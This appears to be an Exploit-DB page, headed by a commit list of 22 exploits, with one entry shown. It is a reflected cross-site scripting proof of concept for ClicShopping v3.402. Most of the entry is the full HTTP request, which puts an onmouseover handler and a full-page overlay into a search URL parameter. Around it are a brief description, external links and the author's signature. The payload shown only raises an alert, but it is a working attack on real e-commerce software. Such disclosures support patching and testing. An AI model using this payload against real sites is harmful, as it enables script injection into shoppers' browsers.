42ade901fe
22 changes to exploits/shellcodes/ghdb LISTSERV 17 - Insecure Direct Object Reference (IDOR) LISTSERV 17 - Reflected Cross Site Scripting (XSS) Router ZTE-H108NS - Stack Buffer Overflow (DoS) Router ZTE-H108NS - Authentication Bypass Boa Web Server v0.94.14 - Authentication Bypass Covenant v0.5 - Remote Code Execution (RCE) Dreamer CMS v4.0.0 - SQL Injection Shoplazza 1.1 - Stored Cross-Site Scripting (XSS) Virtual Reception v1.0 - Web Server Directory Traversal 4images 1.9 - Remote Command Execution (RCE) ClicShopping v3.402 - Cross-Site Scripting (XSS) Concrete5 CME v9.1.3 - Xpath injection Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE) Ecommerse v1.0 - Cross-Site Scripting (XSS) Eve-ng 5.0.1-13 - Stored Cross-Site Scripting (XSS) myBB forums 1.8.26 - Stored Cross-Site Scripting (XSS) WPForms 1.7.8 - Cross-Site Scripting (XSS) CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path Zillya Total Security 3.0.2367.0 - Local Privilege Escalation
56 lines
No EOL
2.3 KiB
Text
56 lines
No EOL
2.3 KiB
Text
## Title: ClicShopping v3.402 - Cross-Site Scripting (XSS)
|
|
## Author: nu11secur1ty
|
|
## Date: 11.20.2022
|
|
## Vendor: https://www.clicshopping.org/forum/
|
|
## Software: https://github.com/ClicShopping/ClicShopping_V3/releases/tag/version3_402
|
|
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3
|
|
|
|
## Description:
|
|
The name of an arbitrarily supplied URL parameter is copied into the
|
|
value of an HTML tag attribute which is encapsulated in double
|
|
quotation marks.
|
|
The attacker can trick users to open a very dangerous link or he can
|
|
get sensitive information, also he can destroy some components of your
|
|
system.
|
|
|
|
## STATUS: HIGH Vulnerability
|
|
|
|
[+] Payload:
|
|
|
|
```js
|
|
GET /ClicShopping_V3-version3_402/index.php?Search&AdvancedSearch&bel9c%22onmouseover%3d%22alert(`Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole`)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22zgm9j=1
|
|
HTTP/1.1
|
|
Host: pwnedhost.com
|
|
Accept-Encoding: gzip, deflate
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
|
Accept-Language: en-US;q=0.9,en;q=0.8
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
|
|
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
|
|
Safari/537.36
|
|
Connection: close
|
|
Cache-Control: max-age=0
|
|
Upgrade-Insecure-Requests: 1
|
|
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
|
|
Sec-CH-UA-Platform: Windows
|
|
Sec-CH-UA-Mobile: ?0
|
|
|
|
```
|
|
|
|
## Reproduce:
|
|
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3)
|
|
|
|
## Proof and Exploit:
|
|
[href]()https://streamable.com/rzpgsu
|
|
|
|
## Time spent
|
|
`1:00`
|
|
|
|
|
|
--
|
|
System Administrator - Infrastructure Engineer
|
|
Penetration Testing Engineer
|
|
Exploit developer at https://packetstormsecurity.com/
|
|
https://cve.mitre.org/index.html and https://www.exploit-db.com/
|
|
home page: https://www.nu11secur1ty.com/
|
|
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
|
|
nu11secur1ty <http://nu11secur1ty.com/> |